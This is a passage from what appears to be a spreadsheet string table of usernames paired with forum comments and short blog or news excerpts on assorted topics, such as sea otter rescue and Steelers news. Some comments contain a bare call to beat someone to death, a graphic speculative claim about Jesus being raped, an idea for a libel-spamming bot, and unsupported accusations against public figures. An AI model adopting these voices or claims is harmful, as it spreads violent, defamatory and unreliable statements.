    <t>savalana</t>
  </si>
  <si>
    <t>He knows it’s a hard job or else he wouldn’t be having a fit about you leaving the house and leaving him to do all that hard work for the day. Tell him y’all need marriage counseling and you are definitely taking a day off and going to see your friends. And if he refuses marriage counseling you need to consider a divorce. Seriously.</t>
  </si>
  <si>
    <t>SpaceNerdGoffel</t>
  </si>
  <si>
    <t>That's the third time this shit is reposted and people still upvote it.</t>
  </si>
  <si>
    <t>WaddlesJP13</t>
  </si>
  <si>
    <t>The Nissan Elgrand is a premium Quest.</t>
  </si>
  <si>
    <t>rainy_day_smell</t>
  </si>
  <si>
    <t>I also had pretty low expectations and don't normally click on these things, but I really loved it! &lt;3 You've got talent and this is better than just a thing that exists!</t>
  </si>
  <si>
    <t>Dogs of Doom</t>
  </si>
  <si>
    <t>a few years back, there was a fad, in modding the OEM footswitch to cutting the cable, installing a CAT-6 jack &amp; make a CAT-6 adapter to use at the amp end. That way, you use any length cable &amp; if the cable goes bad, you can just replace it. You can use CAT-5 or whatever cable. I never got around to doing it. My footswitch is still in great shape, although, i never use it. I would if I played out w/ it, but, at home, I just hit the button, since I'm not playing to a band &amp; need to keep my switching in time to the song... I haven't plugged in to the TSL though, in quite some time...</t>
  </si>
  <si>
    <t>ZINC_WHITE_III</t>
  </si>
  <si>
    <t>I listen to music to pretend that I can hear.</t>
  </si>
  <si>
    <t>mikec433</t>
  </si>
  <si>
    <t>Any other symptoms? Adults can get HFM which shows up with big monster blisters like this. I would agree this doesn’t look like an angry inflammatory problem like gout</t>
  </si>
  <si>
    <t>sapphire357</t>
  </si>
  <si>
    <t>NAH I don't think he suddenly chose this moment to be upset... he's probably had some sadness and hurt building up for a bit of time. Take some time to chill out and then explain it to him - the specific instances you would be upset about last minute plans and the instances you wouldn't be, and the reason why you want to go to happy hours yourself.</t>
  </si>
  <si>
    <t>gingerperson</t>
  </si>
  <si>
    <t>No there isn't more to it. Trump started a trade war. China took their business elsewhere. Trump lost his trade war because hes an idiot. Trump used "socialism" to bail out the farmers he fucked over.</t>
  </si>
  <si>
    <t>RinaVargo</t>
  </si>
  <si>
    <t>If you use Spotify: There's a news podcast called "Radio Sweden på lätt svenska" that helps me a lot. They are always only a few minutes long, though, but you can always listen to the older episodes as well.</t>
  </si>
  <si>
    <t>Mundy94</t>
  </si>
  <si>
    <t>Wouldn't consider it hardcore no, I'm not saying it's small amount of your time to use, just not hardcore.</t>
  </si>
  <si>
    <t>Deathman874</t>
  </si>
  <si>
    <t>Thanks for the giveaway!</t>
  </si>
  <si>
    <t>massivekettle</t>
  </si>
  <si>
    <t>Border said: His accuser basically says, "Yes, I knew this would come out. I'm moving on and I am not going to talk about it anymore." Click to expand... Click to shrink... Another reason why outrage should wait until all the facts in a particular case are out in the open. It doesn't excuse his other alleged behavior, but that woman needs to be held accountable for what she did.</t>
  </si>
  <si>
    <t>Inflatable_Potato</t>
  </si>
  <si>
    <t>This AMA is going worse than Woody's Rampart. How shameful to be propping up a child raping, racist, treasonous, money laundering *President</t>
  </si>
  <si>
    <t>PrisonFoodAndPenis</t>
  </si>
  <si>
    <t>Ben wouldn’t do that. As much of a shithead as he is, he wouldn’t put what could be his last chance at a ring in the hands of Josh Dobbs</t>
  </si>
  <si>
    <t>toTheNewLife</t>
  </si>
  <si>
    <t>Turn off your sound system. If it's night time, turn on the reading lights.</t>
  </si>
  <si>
    <t>Sudheer Chada</t>
  </si>
  <si>
    <t>I am talking about selenium tests and user manuals or help documents talks about Coded UI tests.</t>
  </si>
  <si>
    <t>Kony2K16</t>
  </si>
  <si>
    <t>The statement was in English. They dont understand English.</t>
  </si>
  <si>
    <t>Rent-0</t>
  </si>
  <si>
    <t>Alliance my ass . no one will get involved in indo pak all our war . WW1 and WW2 are different era with racism + nationalism was at peak . Why would China or Russia or USA will drag themselves into potential nuclear war. They will issue strong statement and go back to sleep . its easier to control when you are week.</t>
  </si>
  <si>
    <t>UnpearledBlunt</t>
  </si>
  <si>
    <t>I have them what's your offer</t>
  </si>
  <si>
    <t>Kanaraketti</t>
  </si>
  <si>
    <t>I feel like this whenever I'm away from my cat for more than a day.</t>
  </si>
  <si>
    <t>amayernican</t>
  </si>
  <si>
    <t>I don't know what I just watched three times but I'm going to pay money to see the rest of the train wreck in the future.</t>
  </si>
  <si>
    <t>dotnetdotcom</t>
  </si>
  <si>
    <t>Well, damn. I just got suckered to click on click-bait.</t>
  </si>
  <si>
    <t>raffaele2406</t>
  </si>
  <si>
    <t>In the actual fresco in Vatican City Adam HAS a belly botton, which let's dubitate a bit on Michelangelo's faith in Bible's reliability. He also painted the [Great Flood](https://upload.wikimedia.org/wikipedia/commons/d/d6/Michelangelo%2C_Deluge_02.jpg) from the point of view of the people left behind with their scared faces. It lets me understand that Michelangelo had a very personal point of view on religion stuff. Maybe not only Noah and its family deserved to be saved...</t>
  </si>
  <si>
    <t>Powdered_Toast_Man3</t>
  </si>
  <si>
    <t>Love this guy</t>
  </si>
  <si>
    <t>-M3L0N-</t>
  </si>
  <si>
    <t>Hi all. I am going to be looking at getting one of these within the next few months and am interested to hear some personal experiences. From what I have read online, it's a well-rounded vehicle and seems like it would be a great choice.</t>
  </si>
  <si>
    <t>Pvtjonwallace0</t>
  </si>
  <si>
    <t>So what you're saying to those frustrated players is to abandon the game? one that already has a small playerbase that is being contracted every time a patch ruins more stuff? one game that has failed and not fullfilled the promises it kept? of that's the case, fine. Enjoy your empty Conquest Servers soon, you know shit is bad when you gotta wait 10 minutes to play Firestorm ALONE on a friday night.</t>
  </si>
  <si>
    <t>666BONGZILLA666</t>
  </si>
  <si>
    <t>the line between russia and the florida panhandle is apparently finer than i thought</t>
  </si>
  <si>
    <t>Printrbot_playa</t>
  </si>
  <si>
    <t>have you tried asking the seller?</t>
  </si>
  <si>
    <t>Marshall671</t>
  </si>
  <si>
    <t>What is your BMI? Some have cutoffs for safe treatment</t>
  </si>
  <si>
    <t>inconspicuous_male</t>
  </si>
  <si>
    <t>Was 13 Reasons recieved well? Until now I have only heard criticism</t>
  </si>
  <si>
    <t>lolipop3k</t>
  </si>
  <si>
    <t>Exactly which steps do you need more than one person for? Let's say I'm playing as Richtofen on solo. Which step won't it let me do by myself?</t>
  </si>
  <si>
    <t>Shetland Sheepdog</t>
  </si>
  <si>
    <t>60 and mostly sunny here in srn NH. Sunny, with a high near 85, forecast for today.</t>
  </si>
  <si>
    <t>donmeta</t>
  </si>
  <si>
    <t>Exactly, why would he not be able to go around? He crashed in an unlucky position in relation to the pits, but he still had to follow the rules. Had he crashed 10m further ahead, we wouldn't be having this discussion, because it's illegal to go backwards around the track, just as it is illegal to go into the pits across the grass on the wrong side of the bollard.</t>
  </si>
  <si>
    <t>ChrystynaS</t>
  </si>
  <si>
    <t>9:10, 68 degrees, and raining. At the beach</t>
  </si>
  <si>
    <t>Sie_Masz</t>
  </si>
  <si>
    <t>malhal 22/07/2019 13:24 with the pound so weak we'll all be immigrating to Poland! Don't recommend it tbh.Petrol price the same as UK and minimum wage is about 2.5 p/h.Beautiful country to visit but hard to live in.</t>
  </si>
  <si>
    <t>sutufukup</t>
  </si>
  <si>
    <t>Beat him to death</t>
  </si>
  <si>
    <t>No, its not directly in the gospels or elsewhere.. [link to www.biblegateway.com (secure)] That of course does not mean it didn't happen, as everything is not included in the Bible, many things are too strong for the overall text. But Jesus was stripped and they put on a purple robe, as mockery, meaning he was naked beneath, and seeing they had him naked, they could have easily done their evil mockery further.... IT was the ancient practice of demeaning and embarrassing your enemy... and then put on the crown of thorns... Remove the robe at Golgotha and then hang Jesus naked on the cross. Again, probably due to present sensitivities, they wouldn't depict Jesus as being totally naked on the cross, but surely he was.... and without a loin cloth. They cast lots for his clothes, as prophesied, so did they gang rape Jesus before killing HIM... Yes very possible and probable. As nothing was sacred to them and death is the ultimate torture, after the demeaning ones before hand. Evil ones love torture and pain. But the real importance can be in knowing and noting that anal sex in this manner was not for pleasure (as in gay sex) but in anal penetration as a means of showing total dominance over the victum. They did to Gadahfhi, and they still do it today, and the churches still don't understand it in gay or heterosexual terms.</t>
  </si>
  <si>
    <t>Ryker1</t>
  </si>
  <si>
    <t>Quote: from: Blockchayne on July 28, 2019, 04:44:33 PM I have no idea how to move the topic. Lol. Well, scroll down and look out the left side of your screen, you will see there lock topic and move topic . Upon watching your video, I saw that you have only 0.005060 BTC. and you are wanted to withdraw 0.005 BTC right?. Indeed, that is obviously insufficient balance. But, as what you had said you have 0.009 BTC balance and still can't withdraw. Try to read terms and condition may be the operator denied your request due to offensive rules might happen on your account.</t>
  </si>
  <si>
    <t>Nossie</t>
  </si>
  <si>
    <t>The very fact we are having this.. discussion - shows quite clearly how far Canada and the rest of the western world has lost their marbles.</t>
  </si>
  <si>
    <t>NemoTheFishyFinn</t>
  </si>
  <si>
    <t>Nah, I've always had an attitude of "People don't owe anything to me".</t>
  </si>
  <si>
    <t>vincentpontb</t>
  </si>
  <si>
    <t>I mean it's really unreasonable to expect uber to pay for your time. There are perks to being self employed, like there are downsides.</t>
  </si>
  <si>
    <t>Dotaproffessional</t>
  </si>
  <si>
    <t>didn't scroll fam. saw an apple product and had to immediately go beat off over my pixel buds</t>
  </si>
  <si>
    <t>wild_dog</t>
  </si>
  <si>
    <t>I would make a lible generator. Just a bot that would send " is " and just let it spam the internet, 100 statements per second should do it, and i would only need a total of 100*60*60*24 = 8,640,000 combinations, or about 2,940 entries in each list.</t>
  </si>
  <si>
    <t>iownadakota</t>
  </si>
  <si>
    <t>There's quite a bit of talk about a consumer based boycott. Just shut the economy down. Mass demonstrations have shown that we can't keep that going for long enough. To many people have too much debt to protest for a month or 2. We can just stop buying shit we don't need. Buy food, diapers, and what not. But just shut down as much commerce as possible. When someone asks why your not out bowling, tell them it's a protest, and they should join.</t>
  </si>
  <si>
    <t>BLOGS</t>
  </si>
  <si>
    <t>npsadmin</t>
  </si>
  <si>
    <t>The victims were locked in homes with windows nailed shut and denied food and medicine, say officials. The post California church leaders ‘used homeless as forced labour’ appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>admin</t>
  </si>
  <si>
    <t>iPhone 11 Pro Max and the Galaxy Note 10+ have been pitted against one another in a brutal speed test to determine once and for all which is the most powerful. Both of these are the latest flagship smartphones from Apple and Samsung – and both cost comfortably over £1,000. Daily Express :: Tech Feed</t>
  </si>
  <si>
    <t>The hapless heroes at the heart of the comedy “Villains,” Mickey (Bill Skarsgard) and Jules (Maika Monroe), are just about the most inept criminals ever. Even when these two lovers manage to rob a gas station, they forget to put gas in their getaway car. Their incompetence leaves them stranded along a remote stretch of highway; the incompetence of the movie around them, however, has the unfortunate effect of leaving the audience even more helpless than the film’s protagonists. Mickey and Jules take refuge in what they think is an empty home alongside the road. But their plans get complicated when they explore the house and find a child chained up in the basement. Armed with the gun they used to threaten the gas station clerk, Mickey and Jules attempt to take on the owners of the home upon their return. The child’s captors George (Jeffrey Donovan) and Gloria (Kyra Sedgwick) prove to be wily — if quirky — opponents. What follows is a cat-and-mouse game between the two sets of crooks, where each couple proves again and again their inability to execute a proper plan. “Villains” zigzags between tones, zanily bouncing between comedy and horror-esque thrills, but it fails to deliver any satisfaction through either genre. As a thriller, it too frequently abandons the logic that’s necessary to maintain suspense. The writer-directors Dan Berk and Robert Olsen are always improbably foiling their characters just as victory is in their grasp. And as a comedy, the jokes, built on tired stereotypes, don’t land — like the childless matron who carries a baby doll. Despite some committed performances, particularly from a refreshingly natural Maika Monroe, “Villains” is a hackneyed farce rich in gimmicks and poor in substance. Villains Rated R for language, sexual content, drug use, brief action sequences and suggestions of violence toward children. Running time: 1 hour 28 minutes. Source link</t>
  </si>
  <si>
    <t>Travel-Store</t>
  </si>
  <si>
    <t>But some of their most important work is behind the scenes, serving as foster moms to abandoned pups in the aquarium’s one-of-a-kind program to rescue, nurture and return sea otter pups to the wild. Rosa and Selka are part of a group of surrogate sea otters who can’t be released back into the wild, either because of injury or inability to stay away from humans. But they still can teach these rescued pups how to be sea otters. They show them how to eat crabs and crack open clams and mussels; they protect and guide the pups during interactions with other otters; and they allow the pups to imprint on their own species, teaching them that they are sea otters. Sea otter Rosa swims in the sea otter exhibit. ©Monterey Bay Aquarium Neither otter has given birth, but Rosa has raised 15 pups and Selka has raised three, one of which was found abandoned at a nearby beach last year. Their most recent pups are due to be released into the wild in late October. Since 2001, the aquarium has rescued and released some 100 sea otter pups as part of its conservation efforts around the world. They are part of the more than 876 sea otters who have been treated at the aquarium. Welcoming nearly two million visitors Resident sea otters at the Monterey Bay Aquarium cannot live in the wild. Katia Hetter/CNN One of California’s most popular tourist destinations, the non-profit aquarium welcomed nearly 2 million visitors in 2018 and reported $103 million in expenses. Some 13 percent of that budget — nearly $13 million — went to conservation and research. The aquarium started rehabilitating newborn and injured sea otters in 1984, before the aquarium even opened its doors later that same year. Because of the fur trade in the 18th and 19th centuries, sea otters were nearly hunted to extinction in the state, the aquarium says. The state’s population is currently just over 3,000 sea otters between Santa Cruz and Santa Barbara. (The otter population has not yet been restored to their historical range from Alaska to Mexico’s Baja California.) The aquarium’s efforts are slowly restoring the local population. “The first animals that we worked with were pups that had stranded, and the idea was that we would be able to populate the exhibit here at the aquarium with stranded animals, as opposed to going out and collecting otherwise healthy wild sea otters and moving them into captivity,” says marine mammal researcher Karl Mayer, who was part of the initial team that developed the surrogacy program. “That really was the advent of this whole sea otter program here,” he says. Bonding with the sea otters Southern sea otter Rosa charms aquarium guests. ©Monterey Bay Aquarium At first, the humans were very hands-on. “Sea otter pups are born in the wild and essentially they have no survival skills whatsoever,” says Mayer. “They’re little corks on the surface of the ocean, they’ve got very bland fur, they’re totally dependent on the mother for essentially 100% of everything that they do.” “When we get an orphan sea otter pup, one of the big challenges is trying to take the place of mom in rearing that pup while still maintaining its wildness.” Everyone in the area knew to call the aquarium when they spotted abandoned or injured sea otters. Aquarium staff cared for the sea otter pups and adults, naming them, feeding them, raising the pups and restoring them to heath. While many otters survived, they got too attached to their human handlers. The first rescues hung out in the bay, expecting food from humans, bothering boaters and kayakers, unable to survive in the wild on their own. In 2001, they developed a solution. Aquarium staff had been trying to pair adult females with rescued pups, and they found the right adoptive mother in an adult female who had just given birth to a stillborn pup at the aquarium. She bonded with a rescued pup, and the surrogacy program was born. Since that year, the aquarium’s sea otter program team has paired the rescues with Rosa, Selka and other female adult otters who can’t be returned to the wild. The ‘Darth Vader’ costumes Caregivers wear “Darth Vader” suits while caring for sea otter pups. Angela Hains/©Monterey Bay Aquarium Aquarium workers also stopped bonding with wild animals. The human aquarium workers started covering their faces and bodies with so-called “Darth Vader” costumes whenever they needed to feed or otherwise care for the pups, limiting eye contact and scent. They also stopped naming the pups, instead giving them more impersonal numbers. Giving them numbers instead of names “reduces the likelihood of attaching to these developing pups or these orphaned pups as if they were pets or in other ways developing a closer association than we want,” says Mayer. “We want these animals to essentially be anonymous, in the sense that ultimately we want them back out in the wild population as opposed to here in captivity.” That reduced the tendency of the pups and humans to bond, increasing the rate of sea otters released into the wild surviving there. Since 2001, the aquarium has released 100 juvenile pups back into the wild, tagging them with transmitters and flipper tags to follow them long-term. Behaving ‘like sea otters are supposed to’ Sea otters act as surrogate moms to orphaned pups at the Monterey Bay Aquarium. Randy Wilder/© Monterey Bay Aquarium The human staff count on the mothering abilities of sea otters like Rosa and Selka. The pups “go through a natural imprinting on the sea otter mother as opposed to on human caregivers and ultimately when they’re released to the wild, they behave out in the wild like sea otters are supposed to,” says Mayer. The grand dame of the sea otter exhibit, Rosa just finished raising a pup abandoned by its mother near Pismo Pier last year. Rosa, who turns 20 in August, was hand-reared by human caregivers and released in 2000. Rosa stayed in contact with humans, approaching divers and kayakers, and so was brought back to the aquarium. She has retired after successfully raising 15 pups. Unable to survive in the wild since her recovery from a 2013 shark wound, Selka has raised three pups so far. Healing the slough’s ecosystem Karl Mayer has been saving sea otters since before the aquarium opened. Katia Hetter/CNN Once weaned, the otters have been released into a small population of sea otters in Elkhorn Slough in Monterey Bay. The slough has been a pretty protected environment. “It was a kind of ideal place to put relatively naive juvenile sea otters that essentially were having to acclimate to an unfamiliar environment.” “What we found was that the sea otters up in Elkhorn Slough are acting as keystone predators,” says Karl Mayer. “Through their feeding habits, they actually allow the ecosystem to become healthier and more diverse.” Now the aquarium has proof that its program works. A recently published study documented how the program “helped restore the population in the coastal estuary, with surrogate-reared otters and their descendants accounting for more than 50 percent of observed population growth” over a 15-year period, the aquarium said in a statement. That’s got aquarium officials thinking about releasing sea otters in Morro Bay on the Central Coast, where a small population of otters already live. Care fit for a sea otter The aquarium’s behind-the-scenes system is impressive. There’s an intensive care unit where the pups are treated for injuries, with cameras so staff can monitor them without the disguises; a food preparation area — sea otters eat about one-third of their weight every day in clams, squid, shrimp, crabs, snails, urchins and mussels; and three open-air tanks on the roof where healthy otters live until their release. No one is allowed to come face-to-face with the otters without a disguise, unless human safety is at risk, even if it’s just tossing food into one of the tanks. Connecting conservation with the public “We can really make a strong connection between what’s going on in the wild population and the public through the animals that we’ve got on public display here on the exhibit,” says Mayer. “An otter like Selka, who was herself reared as a surrogate pup, released back to the wild and then wound up suffering shark bite trauma — she winds up being an ambassador for her wild counterparts and really can sort of be an exemplar for how difficult it is for these animals to survive out in the wild.” These sea otters adopt orphaned pups and raise them to be wild The post These sea otters adopt orphaned pups and raise them to be wild appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Jeff.Hartman</t>
  </si>
  <si>
    <t>David Butler II-USA TODAY Sports Time to check on the latest news surrounding the Pittsburgh Steelers. The Pittsburgh Steelers are moving into Week 2 of the NFL regular season, and as the team prepares for the Seattle Seahawks, we continue to provide you with features, commentary and opinions to tide you over until the season starts! Today in the black-and-gold links article we take a look at how despite having their doors blown off in Week 1 by the New England Patriots, that doesn’t necessarily mean the season is over after one game. Let’s get to the news: If you are like many Steelers fans, you are still angry and disappointed after the team’s dismal efforts in Week 1. Losing 33-3 is a gut punch, but it doesn’t mean the season is over, history tell us that. History shows Week 1 losses don’t doom Steelers’ entire season By: Chris Adamski, Pittsburgh Tribune-Review Many Steelers said Sunday’s loss — ugly as it was, and demoralizing as it could have been considering the opponent — was just one-16th of a regular season that is barely underway. The Steelers have won just three of their past nine season openers. They rebounded to make the playoffs during two of the previous four they’ve lost, including 2015, when they similarly were beaten soundly by a Patriots team that raised a Super Bowl banner while they watched. “It’s one game. No one is panicking here yet,” veteran guard David DeCastro said. “Obviously, not what you’re hoping for and not what you expected. But just get back on the horse and get back to work Wednesday,” Week 1, in general, hasn’t necessarily been an accurate harbinger for the remainder of the season for the Steelers. Among all the season openers they won or lost — last season was a 21-21 tie at the Cleveland Browns — since 1980, the outcome correlated with the Steelers making the playoffs in just 17 of 38 seasons. The Steelers were 21-17 in opening games between 1980-2017. During the 21 seasons they started 1-0 in that span, they qualified for the postseason 11 times. Of the 17 seasons that began with a defeat, the Steelers rebounded for a playoff berth 11 times. To read the full article, click HERE (Free) People want someone to blame for the Steelers’ loss on Sunday night. Ben Roethlisberger says point the finger at him. Big Ben takes blame for Steelers’ woes at Pats By: Jeremy Fowler, ESPN So much for that new-look offense without Antonio Brown and Le’Veon Bell. Those players were missed on a miserable night of football for the Pittsburgh Steelers, whose 33-3 loss to the New England Patriots on Sunday left their quarterback placing blame squarely on himself. ”I wasn’t good enough,” said Ben Roethlisberger, who went 27-of-47 for 276 yards and one interception. “I wasn’t giving guys balls where they needed to catch them. Put them in front, behind, things like that. So, just — I wasn’t good enough.” The Steelers finished the game with 308 yards, but many of those came in garbage time. At halftime, Pittsburgh had limped to four first downs, one third-down conversion and 87 yards. James Conner and the rushing attack managed 32 yards and and failed to convert several short-yardage situations. From five-wide sets to zone running plays, nothing the Steelers tried worked, with Roethlisberger missing on three of his four deep-ball attempts. The Steelers most recently scored three points in a season opener in 2001, losing 21-3 to the Jacksonville Jaguars. The message was sent. To read the full article, click HERE (Free) You might as well call Tom Brady a surgeon, because he dissected the Steelers’ defense Sunday. Classroom: Brady’s defensive dissection By: Chris Carter, DKPittsburghSports Death, taxes and Tom Brady beating the Steelers at Gillette Stadium. Few things in life are guaranteed, but these are the exceptions. Brady did lose to the Steelers last year and barely escaped in 2017, but those were games at Heinz Field. The only time the Steelers have come within a possession of Brady was when they scored garbage points against the Patriots at Gillette in the 2015 season opener when they lost 27-21. But there’s a recipe to the destruction the six-time Super Bowl champion quarterback imposes on the Steelers each time. It seems simple with the ease that he has beaten the Steelers over the years, but it takes several steps for Brady to be as consistent as he’s been. To read the full article, click HERE ($$) Mike Tomlin’s Weekly Press Conference #LIVE: Coach Tomlin addresses the media prior to our game against Seattle. https://t.co/zhOOgH4wrO — Pittsburgh Steelers (@steelers) September 10, 2019 Joshua Dobbs bids farewell to the Steelers, and their fan base All love for the Burgh! I appreciate the @steelers for the opportunity to start my @NFL career. Thank you to everyone for the well wishes. So grateful for the support, encouragement &amp; friendships. Incredibly blessed &amp; excited for new beginnings with the @Jaguars! #DUUUVAL pic.twitter.com/BGQpSZtglV — Josh Dobbs (@josh_dobbs1) September 10, 2019 Social Media Madness Missi, Bob, Tunch and Arthur recap our game against New England. #SteelersLive pic.twitter.com/DbDl66oOJa — Pittsburgh Steelers (@steelers) September 9, 2019 We have agreed to terms with LB Jayrone Elliott and signed QB Devlin Hodges to the practice squad.@BordasLaw TRANSACTION: https://t.co/oqZIaF5IIR pic.twitter.com/EktLNdKQFA — Pittsburgh Steelers (@steelers) September 10, 2019 Our rookie class is at @UPMC Magee-Womens Hospital to deliver some #Steelers gear &amp; #TerribleTowels to families with newborns. Follow along ➡️ : https://t.co/FSvGUkcSez#SteelersHuddlefor100 pic.twitter.com/NLuLkHZm3c — Pittsburgh Steelers (@steelers) September 10, 2019 Rookies everywhere at @UPMC Magee Hospital. pic.twitter.com/QOakbbhltf — Missi Matthews (@missi_matthews) September 10, 2019</t>
  </si>
  <si>
    <t>BREXIT PARTY chairman Richard Tice has revealed why he believes Remainers and Opposition parties do not want a General Election. Daily Express :: News Feed</t>
  </si>
  <si>
    <t>Antoine</t>
  </si>
  <si>
    <t>Although Bitcoin faced a strong and swift rejection from the upper-$10,000 region yesterday, many major altcoins have been able to surge against their BTC trading pairs today, with Litecoin leading the way. Importantly, today’s surge in the aggregated altcoin market may signal that they are once again beginning to form an inverse correlation with Bitcoin, which could be emblematic of the start of the prophesized “altseason” that many embattled investors are hoping for. Litecoin Surges 7% Against Bitcoin; Is “Altseason” Coming? At the time of writing, Litecoin is trading up just under 3% at its current price of $69, which is up significantly from its daily lows of under $65. While looking towards LTC’s Bitcoin trading pair, its daily gains are even more impressive, as it is currently trading up nearly 7% at its current price of 0.0066 BTC. Litecoin is not alone in its surge against BTC today, as most major altcoins are currently trading up 3% or more from their 24-hour lows, with XRP trading up 4%, Ethereum trading up 3%, and Bitcoin Cash trading up 4%. Notably, Bitcoin faced a swift rejection from highs of nearly $11,000 yesterday, which sent it reeling down to its current price of $10,400. Although BTC’s price action typically guides that of the aggregated altcoin market, today appears to be quite the anomaly. One key feature of “altseasons” seen in years past is that altcoins begin forming an inverse correlation with Bitcoin, as capital from BTC begins flowing into other cryptos. It remains unclear as to whether or not today’s price action is emblematic of this type of inverse correlation forming, but one key indicator that investors will likely be watching closely in the coming days and weeks is BTC’s dominance over the aggregated crypto markets. Currently, its dominance is sitting just slightly below its multi-year highs of 71%, and due to the lack of fresh capital in the crypto markets, it will be impossible to say with any certainty whether or not the next “altseason” is starting until its dominance begins dropping. As it grows increasingly clear as to which direction Bitcoin will trend throughout the second half of 2019, it is highly likely that investors and analysts alike will soon gain a better understanding of whether or not this dominance will soon begin to subside. report this ad</t>
  </si>
  <si>
    <t>Cyber Den</t>
  </si>
  <si>
    <t>Source: https://finovate.com/dorsum-builds-wealth-management-platform-for-bnp-paribas-in-poland/ Dorsum Builds Wealth Management Platform for BNP Paribas in Poland One of Poland’s leading private banks, BNP Paribas Bank Polska, will deploy a new digital portfolio management solution from FinovateEurope Best of Show winner Dorsum. The bank will implement the Hungarian software company’s Wealth Management Platform to help give its advisors and wealth management relationship managers comprehensive wealth reporting, MiFID II compliant advisory workflows, as well as investment portfolio advisory. Director of Brokerage House at BNP Paribas Bank Polska Emilia Jakubiak emphasized that the wave of digitization that is transforming the financial sector is as critical for financial services professionals as it is for customers. “It is not enough to focus only on the client facing platforms,” she said. “It is also important to give bank relationship managers a highly advanced and ergonomic digital platform for their everyday work. Dorsum’s solution will assist us in further improvement of our services and customer experience. ” Jakubiak noted that the enhanced portfolio overview and MiFID 2 alignment in particular would enable advisors to “dedicate more attention to each customer which will additionally support the growth of the business in the investment segment.” BNP Paribas Bank Polska is a member of the international BNP Paribas banking group. The institution, founded in 2015 and known previously as Bank BGZ BNP Paribas, offers savings, investment, and financing products to individual clients, and participates in the financing SMEs and corporate enterprises need in order to operate both in the Polish and international markets. The universal bank is listed on the Warsaw Stock Exchange. “We are very proud that we have been chosen by another very prominent player in the European market,” Dorsum CEO Róbert Kő said. “BNP Paribas Bank Polska has positioned itself as potential market leader in the Polish private banking sector by embracing growth and innovation.” At FinovateEurope earlier this year, Dorsum demonstrated its My Wealth app, which combines traditional and digital advisory processes to provide clients with a broader, more comprehensive view of their investments. The app features a self-learning chatbot, automatic portfolio notifications, and news, and supports the ability to reach out to the client’s financial advisor via a variety of channels. Founded in 1996 and headquartered in Budapest, Dorsum works with more than 80 financial institutions, serving clients in 10+ countries and more than 8,000 individual users. A leading software company in the Central and Eastern European (CEE) market, Dorsum announced successfully implementing the new integrated securities account management system for Takarék Group in April. In March, the company won the SME Top 100 Silver Award in the Service Providers category at the Best Engines of the Economy conference series. The post Dorsum Builds Wealth Management Platform for BNP Paribas in Poland appeared first on Finovate. Source: https://finovate.com/dorsum-builds-wealth-management-platform-for-bnp-paribas-in-poland/ The post Dorsum Builds Wealth Management Platform for BNP Paribas in Poland appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>More than 80 tigers that were rescued from a temple in Thailand have died from a viral disease, according to local media reports. Read more? Click here</t>
  </si>
  <si>
    <t>Basil</t>
  </si>
  <si>
    <t>It’s Saturday. But, you probably knew that already. Unless you were waking up a little groggy and thinking it was Friday. In which case you really know how to do Thursday night. I want to party with you. Anyway, it’s Saturday. And I’m trying to decide what I want to do today. Georgia Southern has a game this evening, and I might drive over to Statesboro for that, but I probably won’t. I didn’t get season tickets this year. I tried to, but the Website wouldn’t let me buy two tickets next to each other, nor would it let me buy two tickets apart from each other. So, it wouldn’t let me buy two tickets. So I didn’t. If they fix their Website, I’ll buy tickets next year. This year, I’ll decide at the last minute and drive over if it’s not sold out. It won’t be sold out. And even if it is, I once went to a game where there were 7,725 more people than seats at that stadium, so I’ll be able to get in. But, like I said, I probably won’t go. I could cut the grass. But I pay someone to do that. I could wash dishes. There are a couple of things in the sink that need washing. And I will. Just not right now. I could watch a movie. I might watch “The Fox and the Hound” or something. Maybe I’ll watch some football. I see that happening. I could lazy around in my underwear watching football. Georgia Southern is on ESPN+ tonight, and I subscribe during football season for this very reason. So, yeah, I’ll do that. But what will I do until then? Alabama and Ole Miss are playing. That should be ugly. Clemson is at North Carolina. Heck, North Carolina couldn’t beat Appalachian State last weekend, so that one will get ugly, and fast. Mississippi State and Auburn is up against Georgia Southern’ game, so I’ll watch the end of that. Not a whole lot of early games I care about. Maybe I’ll watch the news. Just kidding. Oh, wait. I remember what it was I needed to do today. I have to prepare for a Website upgrade. Making backups. Checking plugins. Ohhhhh. *sigh* What are you doing? Maybe I’ll come help with that. You got nachos or pizza, right? 0 0</t>
  </si>
  <si>
    <t>The Resistance</t>
  </si>
  <si>
    <t>[High Praise! to According to Hoyt] Conceived in Liberty; Born in Revolution [Think you have a link that’s IMAO-worthy? Send it to harvolson@gmail.com. If I use your link, you will receive High Praise! (assuming you remember to put your name in the email)] 0 0</t>
  </si>
  <si>
    <t>Michael Ruffles</t>
  </si>
  <si>
    <t>A heroin trafficking past was bad enough. Then came the accusations of fake degrees and plagiarism, and a $38 million bitcoin scam.</t>
  </si>
  <si>
    <t>submitted by /u/Jsmith4523 [link] [comments] Would like to see what people on r/apple think as well!</t>
  </si>
  <si>
    <t>British Prime Minister Boris Johnson's decision to suspend parliament is unlawful, a Scottish court has ruled. The case was originally dismissed at the Court of Session last week, where Judge Lord Doherty said it was for politicians and not the courts to decide on shutting down the Commons and Lords for five weeks. However, three judges of the Inner House - the supreme civil court in Scotland - disagreed with that ruling on Wednesday. A summary handed down said,UK "this was an egregious case of a clear failure to comply with generally accepted standards of behaviour of public authorities". The United Kingdom government plans to appeal the latest ruling at the Supreme Court — the highest judicial body in the country. Image: AP</t>
  </si>
  <si>
    <t>If you’ve ever dreamt of running your own BnB in a gorgeous country setting, here is your chance to ramp that idea up a few thousand per cent.</t>
  </si>
  <si>
    <t>What is our reason for being here? That was the question we asked ourselves at the very beginning.</t>
  </si>
  <si>
    <t>TEAM</t>
  </si>
  <si>
    <t>It looks like a tool to help players get the games they bought and play on different Steam platforms easier. The Steamgriddb Manager tool allows you to import your games from different launchers into your "one-click" Steam account library. The manager, available on the Steamgriddb website, currently supports Origin, Uplay, Epic Games, Blizzard Battle.net and GoG.com launchers (and, according to the page header, also Discord), which allows you to import the games you own. them in Steam with the help of the tool. The site says: "Launch them from Steam and take advantage of Steam features, such as Large Format Image, Steam Overlay, Steam Input and Home Streaming." In addition, the manager will let you choose "grids" in his "fast growing" image database for your games, that it 's all about Steam, imported to the game. using the Manager Tool or "Games other than Steam Manually Added". So, if you want to play games like Apex Legends, Battlefield V, or maybe the Sims 4, which you may have on your Origin launcher, or maybe some of these Epic exclusives from Steam, that sounds like Steambriddb manager. will help you do just that. According to the project's Github page, accessible on the manager's website, there appear to be three contributors, along with the user names doZennn, PhantomGames and MichaelDay. It also indicates that other supported launchers will be available soon. The tool is available on the 